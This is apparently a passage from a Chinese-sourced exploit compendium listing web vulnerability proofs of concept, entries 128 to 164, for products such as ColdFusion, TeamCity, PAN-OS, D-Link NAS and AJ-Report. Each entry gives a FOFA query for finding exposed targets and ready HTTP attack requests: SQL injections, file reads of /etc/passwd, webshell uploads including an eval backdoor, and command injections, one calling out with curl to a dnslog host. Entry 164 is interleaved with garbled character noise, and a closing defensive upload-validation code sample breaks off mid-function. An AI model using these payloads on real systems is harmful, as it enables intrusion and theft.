<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Backend address: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and below authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall (H5 云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kirisun (福建科立讯) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kirisun (福建科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kirisun (福建科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kirisun (福建科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kirisun (福建科立讯) communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass via template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. 天维尔 fire rescue combat dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the echoed file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104 / DVR-4216 OS command injection
CVE-2024-3721
FOFA: "Location: /login.rsp"
Affected: TBK DVR-4104, TBK DVR-4216

curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

The mdc parameter decodes to: echo; echo asrgkjh0 > /var/example.txt; ls -l /var; echo ----------------; cat /var/example.txt; A response that lists /var and then prints asrgkjh0 confirms execution. Note that this PoC writes a file on the device.


157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA: body="/common/scripts/basic.js"

POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

The file keeps its submitted name under a fixed directory. Verify with http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp, which should return nyhelxrutzwhrsvsrafb.


158. Masa CMS (Mura CMS fork) processAsyncObject SQL injection
CVE-2024-32640
FOFA: "Generator: Masa CMS"

POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

The escaped quote in contenthistid is an error-based probe: a vulnerable instance leaks a database error in the response. Entry 187 shows the time-based variant of the same CVE against Mura CMS.


159. INFINITT PACS (英飞达医学影像存档与通信系统) WebJobUpload arbitrary file upload
FOFA: "INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")

POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

bufValue carries the body of the uploaded .asmx (elided here, following this article's PAYLOAD convention for long payloads). The uploaded web service is then invoked as:

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")


160. Sonatype Nexus Repository 3 path traversal / arbitrary file read
CVE-2024-4956
FOFA: title="Nexus Repository Manager"

GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Unauthenticated; fixed in Nexus Repository 3.68.1. The PoC depends on the percent-encoded slashes, so a front-end proxy that normalises paths can mask the issue during testing while Nexus itself stays vulnerable.


161. 科拓全智能停车收费系统 Webservice.asmx arbitrary file upload
FOFA: body="/KT_Css/qd_defaul.css"

Step 1: upload the file. <fileName> sets the stored file name (traversal is not filtered) and <fileFlow> carries the file content, base64-encoded.

POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

Step 2: the ../ prefix drops the file at the web root. The fileFlow value above decodes to the marker string jwjnagszaswudhtnhpaw, so the check is:

http://x.x.x.x/dizxdell.aspx


162. 和丰多媒体信息发布系统 QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"

POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

remotePath chooses the destination directory under the web root. Verify with http://x.x.x.x/opt/resources/kjuhitjgk.aspx, which should return ujidwqfuuqjalgkvrpqy.


163. 号卡极团分销管理系统 ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"

POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

The source does not give the stored path; the upload response is where to look for it. Note the image/jpeg part type with a .php name, i.e. the handler checks neither the extension nor the content.


164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传0 H- U. d9 I) s2 m$ @1 n' V& ~/ z
FOFA: title="智慧综合管理平台登入"; L/ _" S3 o( o# `
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1) x* [' m& j0 p  N* t' g1 v1 J
Host: x.x.x.x
+ r% \. {0 Y$ v& x7 j7 e  g, A! yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
( P! _& M2 W+ iContent-Length: 288
% g' P) g. p2 y+ FAccept: application/json, text/javascript, */*; q=0.015 k6 l0 s- g4 f/ Z7 g: q5 ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,0 {, i# w% |9 x* F) V7 Y  U- b
Connection: close* ]- ^. C, {. m0 U3 i* a# f
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
' @( u; I9 ~4 N* _: |  ]3 oX-Requested-With: XMLHttpRequest( C1 q3 Q3 V& B4 D6 p: p" ?
Accept-Encoding: gzip
  F/ G( z2 A( ~3 C' ^" s7 ?8 M0 Q+ Z* V( I: l" u* Q6 M, }5 O
------dqdaieopnozbkapjacdbdthlvtlyl
$ @* R+ n( B' n/ p7 RContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
1 K! z9 J. k: \. [5 d9 N7 S' u& VContent-Type: image/jpeg. f& i. y, m; X4 Z7 X# J  _- E

& P* e0 i" C/ Z5 D/ C<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
$ `( d) B' F/ a# K: g! T% `  E6 U------dqdaieopnozbkapjacdbdthlvtlyl--! C; J. |$ T* u/ C3 V( H
+ ?, b, l9 T9 U' A; I% t, @
1 X  _6 S$ A, i4 r" d+ @# {
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
& k% `  B- F: q4 D. ^
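Entries 161 to 164 come down to one defect: the handler takes a client-supplied file name (and, in 161, a base64 body) and writes it under the web root without checking either. The following is an added example, not code from any of these vendors or from the original article, of how an UploadResume-style handler should treat those two inputs; the allowed-extension list and the /srv/uploads base directory are assumptions for the illustration. It also decodes the fileFlow value from entry 161 so the marker can be checked without a target.

```python
"""Hardened counterpart to the UploadResume handler abused in entry 161 (and the
upload handlers in 162-164): validate the client-supplied name, then decode the body.
Example code written for this page; ALLOWED_EXT and the base directory are assumptions."""
import base64
import os
import posixpath

# Assumption: what a resume/attachment endpoint actually needs to accept.
ALLOWED_EXT = {".pdf", ".doc", ".docx", ".png", ".jpg"}


class UploadRejected(ValueError):
    pass


def safe_upload_path(base_dir, client_name):
    """Map client_name onto base_dir, refusing traversal and server-executable extensions."""
    base = os.path.realpath(base_dir)
    # Reduce to the last path component so '../../../../x.aspx' and 'a\\..\\x.aspx'
    # cannot leave base_dir (ASP.NET on Windows treats backslash as a separator too).
    name = posixpath.basename(client_name.replace("\\", "/"))
    if not name or name in (".", ".."):
        raise UploadRejected("empty or dot-only file name")
    ext = os.path.splitext(name)[1].lower()
    if ext not in ALLOWED_EXT:
        raise UploadRejected(f"extension {ext or '(none)'} not allowed")
    dest = os.path.realpath(os.path.join(base, name))
    # Defence in depth: always true after basename(), but cheap, and it survives a
    # future edit that relaxes the name rule above.
    if os.path.commonpath([base, dest]) != base:
        raise UploadRejected("destination escapes the upload directory")
    return dest


def decode_file_flow(file_flow_b64):
    """Decode the base64 file body; validate=True rejects bytes outside the alphabet."""
    return base64.b64decode(file_flow_b64, validate=True)


def upload_verdict(base_dir, file_name, file_flow_b64):
    """Return 'accepted:<path>:<bytes>' or 'rejected:<reason>'; nothing is written."""
    try:
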